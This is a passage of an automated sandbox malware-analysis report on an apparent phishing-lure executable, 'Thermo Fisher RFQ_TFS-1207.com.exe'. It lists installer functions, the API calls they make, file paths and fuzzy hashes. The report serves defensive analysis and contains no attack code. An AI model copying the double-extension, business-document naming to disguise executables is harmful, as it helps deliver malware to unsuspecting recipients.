Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 64215A7150010ABFDF129F90CE89EEF7A7DEB14398F110076B909B21A0D7B48E54AA64

Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401DBF
GetClientRect.USER32(?,?), ref: 00401E0A
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
DeleteObject.GDI32(00000000), ref: 00401E5E

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
Instruction ID: bf706e621430f2b8e1e8296bf8ea73d697ba0e02d4cfc8f60e3200fcd9798b2c
Opcode Fuzzy Hash: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
Instruction Fuzzy Hash: 57212A72904119AFCB05DF94DE45AEEBBB5EB08300F14403AF945F62A0DB389D81DB98

Function 6FE716BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FE722D8,?,00000808), ref: 6FE716D5
GlobalAlloc.KERNEL32(?,00000000,?,00000000,6FE722D8,?,00000808), ref: 6FE716DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FE722D8,?,00000808), ref: 6FE716F0
GetProcAddress.KERNEL32(6FE722D8,00000000), ref: 6FE716F7
GlobalFree.KERNEL32(00000000), ref: 6FE71700

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: d719245b17e3c860621d59a5b6f451da3fe4eb2e43e8072754e6911b9a5f50c2
Instruction ID: 750004ff1fc17039293fa46303c7ae1c527e85f8b5f43eeeea44f5e26cb713d7
Opcode Fuzzy Hash: d719245b17e3c860621d59a5b6f451da3fe4eb2e43e8072754e6911b9a5f50c2
Instruction Fuzzy Hash: F8F01272106538BBDA2156A69C4CC9B7E9DEF8B2F5B110216F618911A085615C11D7F2

Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0

Strings

!, xrefs: 00401CA4

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
Instruction ID: 31ba3c168d84f0c85bcad1357d39928db2ba622a9cc012c1a012c7db44d830b4
Opcode Fuzzy Hash: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
Instruction Fuzzy Hash: 66218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98

Function 00404D80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 00404E21
wsprintfW.USER32 ref: 00404E2A
SetDlgItemTextW.USER32(?,007A1748), ref: 00404E3D

Strings

%u.%u%s%s, xrefs: 00404E0B

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
Instruction ID: afd2be291b2a15d2af8ae11ee91158e81c8ac3063311500d61ab43a3e8b0c9b4
Opcode Fuzzy Hash: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
Instruction Fuzzy Hash: 6F11E77360423837DB10996D9C45E9E3298DF85374F254237FA66F31D1EA79DC2182E8

Function 00405F2B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,?,0000000A,?), ref: 00406561

Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405EDC
Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9

lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"), ref: 00405F84
GetFileAttributesW.KERNEL32(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,75F03420,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,75F03420,C:\Users\user\AppData\Local\Temp\), ref: 00405F94

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2B
P?z, xrefs: 00405F31

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$P?z
API String ID: 3248276644-3222627218
Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E

Function 00405E23 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00405E29
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,?,0000000A,?), ref: 00405E33
lstrcatW.KERNEL32(?,0040A014,?,?,0000000A,?,?,?,?,?,?,?,?,?), ref: 00405E45

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: EDD0A771101534BAC212AB54AC04CDF73ACAF46344342403BF541B30A5C77C5D5187FD

Function 6FE710E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?), ref: 6FE71171
GlobalAlloc.KERNEL32(?,?), ref: 6FE711E3
GlobalFree.KERNEL32 ref: 6FE7124A
GlobalFree.KERNEL32(?), ref: 6FE7129B
GlobalFree.KERNEL32(00000000), ref: 6FE712B1

Memory Dump Source

Source File: 00000000.00000002.87376840731.000000006FE71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FE70000, based on PE: true

Associated: 00000000.00000002.87376762635.000000006FE70000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376915461.000000006FE74000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.87376990254.000000006FE76000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fe70000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a53ea362e88dd6932f52b9f5fca08d497e843f5a867dfb0c86ebadf4efa3d515
Instruction ID: 21475f17d8681c229aabab6b402b524ba69cda029c84bcd2781fb7cc84537844
Opcode Fuzzy Hash: a53ea362e88dd6932f52b9f5fca08d497e843f5a867dfb0c86ebadf4efa3d515
Instruction Fuzzy Hash: DA519DB5900712DFDB20CFA8D964A667FE9FB47328B20451AF944DB250EB38F911DB50

Function 00402663 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll), ref: 004026BA

Strings

C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp, xrefs: 004026A8
C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll, xrefs: 0040267E, 004026A3, 004026B5, 00402701

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp$C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dll
API String ID: 1659193697-4265805118
Opcode ID: b8575b449f0ed2f2ae019e5d4e70b49293f3ca762bd0c00a65c0af1d038813a1
Instruction ID: 017f71272b68274a12e342b3970613002fe1d3414b89f7e2a3fd3533f9475010
Opcode Fuzzy Hash: b8575b449f0ed2f2ae019e5d4e70b49293f3ca762bd0c00a65c0af1d038813a1
Instruction Fuzzy Hash: C7110D72A10206BBCB00BBB19F46AAE7B616F51748F20843FF502F61D1DAFD8851631E

Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
GetTickCount.KERNEL32 ref: 0040306F
CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
ShowWindow.USER32(00000000,00000005), ref: 0040309A

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
Instruction ID: 04dff40eaa5975d4421a2039d3eb5be5080597dcfa90b8d0ab21d67e5ec7c10f
Opcode Fuzzy Hash: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
Instruction Fuzzy Hash: BFF05430406621AFC6616F50FD08A9B7B69FB45B12B45843BF145F11E8C73C48818B9D

Function 0040554D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557C
CallWindowProcW.USER32(?,?,?,?), ref: 004055CD

Part of subcall function 0040451F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531

Strings

, xrefs: 0040555D

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
Instruction ID: 8cb385540c394feb6b7acedb458c1b163c7bd0e2eecbca803c6ec6ccc0281e24
Opcode Fuzzy Hash: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
Instruction Fuzzy Hash: 68017C71101609FBEF205F11DD84A9B3A2BEBC4754F20403BFA05761D5D73A8D929E6D

Function 00403B91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(6FE70000,75F03420,00000000,C:\Users\user\AppData\Local\Temp\,00403B69,00403A7F,?,?,?,0000000A,?), ref: 00403BAB
GlobalFree.KERNEL32(00A7CF70), ref: 00403BB2

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B91

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
Instruction ID: b7081a2a86391088548fef66407111aafa244a1a89fd4905b066b82f00895e7d
Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
Instruction Fuzzy Hash: 59E0C23340053057CB211F45ED04B1AB778AF95B26F09807BE940BB2618BBC2C438FC8

Function 00405E6F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00405E75
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040310E,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe,80000000,00000003), ref: 00405E85

Strings

C:\Users\user\Desktop, xrefs: 00405E6F

Memory Dump Source

Source File: 00000000.00000002.87353660468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.87353631384.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353695868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87353727574.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.87354320706.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Thermo Fisher RFQ_TFS-1207.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: e625fb8110be14d05545ed3956eb9dcd351d24123ebbdb87cfc6543e98ba95a5
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: 27D05EB3400920AAC312A704DD00DAF73A8EF523447464466F881A71A5D7785D8186EC

Function 00405FA9 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

